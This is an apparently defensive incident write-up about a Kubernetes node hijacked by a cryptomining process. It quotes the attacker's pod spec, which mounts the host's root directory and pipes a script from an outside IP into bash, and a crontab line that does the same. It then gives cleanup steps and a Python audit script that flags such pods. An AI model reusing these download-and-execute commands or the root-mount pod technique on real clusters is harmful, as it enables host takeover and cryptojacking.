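The server's CPU usage was at 100%. The top command showed that the process pubg -c config.json -t 2 was consuming the CPU, and the process restarted automatically after being killed. The attacker got in by creating a pod through Kubernetes.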
Name:           kube-api-zbplw
Namespace:      default
Node:           120.79.2.25/120.79.2.25
Start Time:     Tue, 05 Dec 2017 16:45:03 +0800
Labels:         <none>
Status:         Succeeded
IP:             172.17.36.4
Controllers:    <none>
Containers:
  centos:
    Container ID:       docker://c293e7063e2f9c38939d24f707cb752a0b76def937b3f30d784fe8202d14b01d
    Image:              centos
    Image ID:           docker-pullable://docker.io/centos@sha256:3b1a65e9a05f0a77b5e8a698d3359459904c2a354dc3b25ae2e2f5c95f0b3667
    Port:
    Command:
      /bin/sh
      -c
      /usr/bin/curl -s http://35.194.156.203/obi.sh | bash -s;sleep 120;cat /mnt/etc/crontab;echo 0
    State:              Terminated
      Reason:           Completed
      Exit Code:        0
      Started:          Wed, 06 Dec 2017 17:03:03 +0800
      Finished:         Wed, 06 Dec 2017 17:05:03 +0800
    Ready:              False
    Restart Count:      0
    Volume Mounts:
      /mnt from hahaha-volume (rw)
    Environment Variables:      <none>
Conditions:
  Type          Status
  Initialized   True
  Ready         False
  PodScheduled  True
Volumes:
  hahaha-volume:
    Type:       HostPath (bare host directory volume)
    Path:       /
QoS Class:      BestEffort
Tolerations:    <none>
Events:
  FirstSeen  LastSeen  Count  From                   SubObjectPath  Type     Reason      Message
  ---------  --------  -----  ----                   -------------  ----     ------      -------
  1d         24m       287    {kubelet 120.79.2.25}                 Warning  FailedSync  Error syncing pod, skipping: failed to "StartContainer" for "POD" with ErrImagePull: "image pull failed for registry.access.redhat.com/rhel7/pod-infrastructure:latest, this may be because there are no credentials on this request. details: (open /etc/docker/certs.d/registry.access.redhat.com/redhat-ca.crt: no such file or directory)"
Solution
1. Delete the pod.
kubectl delete pod kube-api-zbplw
2. Modify the crontab configuration.
cat /etc/crontab
* * * * * root /usr/bin/curl -s http://35.194.156.203/steam.sh | /bin/bash -s
3. Stop crond, clear the crontab configuration, then kill the pubg process. This resolved the problem.
service crond stop
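To check whether any other pod in the cluster follows the same pattern as the pod shown above (a hostPath volume that mounts the node's / and a command that pipes a download into a shell), the pod list can be audited offline. This is an added example, not part of the original post; the file name audit_pods.py, the SENSITIVE_PREFIXES list and the sample data (including the placeholder URL) are assumptions.

```python
import json
import re
import sys

# Host paths that hand over the node when mounted (assumed list, extend as needed).
SENSITIVE_PREFIXES = ("/etc", "/root", "/var/run/docker.sock", "/var/lib/kubelet")
# Download piped straight into a shell, as in the Command field of the pod above.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(\S*/)?(ba)?sh\b")

# Constructed sample shaped like `kubectl get pods -o json`; the URL is a placeholder.
SAMPLE = {"items": [
    {"metadata": {"name": "kube-api-zbplw", "namespace": "default"},
     "spec": {"volumes": [{"name": "hahaha-volume", "hostPath": {"path": "/"}}],
              "containers": [{"name": "centos", "image": "centos", "command": [
                  "/bin/sh", "-c", "/usr/bin/curl -s http://198.51.100.7/x.sh | bash -s"]}]}},
    {"metadata": {"name": "web-1", "namespace": "prod"},
     "spec": {"volumes": [{"name": "data", "emptyDir": {}}],
              "containers": [{"name": "nginx", "image": "nginx"}]}},
]}


def risky_host_path(path):
    """True for the node root or anything at or below a sensitive prefix."""
    norm = "/" + path.strip("/")
    return norm == "/" or any(norm == p or norm.startswith(p + "/") for p in SENSITIVE_PREFIXES)


def audit_pods(pod_list):
    """Return (namespace, pod, finding) tuples for a pod list document."""
    findings = []
    for pod in pod_list.get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        ns, name = meta.get("namespace", "default"), meta.get("name", "?")
        for vol in spec.get("volumes", []):
            host_path = (vol.get("hostPath") or {}).get("path")
            if host_path is not None and risky_host_path(host_path):
                findings.append((ns, name, "hostPath %s (volume %s)" % (host_path, vol.get("name"))))
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            cmdline = " ".join(c.get("command", []) + c.get("args", []))
            if PIPE_TO_SHELL.search(cmdline):
                findings.append((ns, name, "download piped to shell in container %s" % c.get("name")))
    return findings


if __name__ == "__main__":
    # kubectl get pods --all-namespaces -o json | python3 audit_pods.py -
    data = json.load(sys.stdin) if sys.argv[1:] == ["-"] else SAMPLE
    for ns, name, finding in audit_pods(data):
        print("%s/%s: %s" % (ns, name, finding))
```

Run without arguments it audits the embedded sample; with `-` it reads the live pod list from standard input.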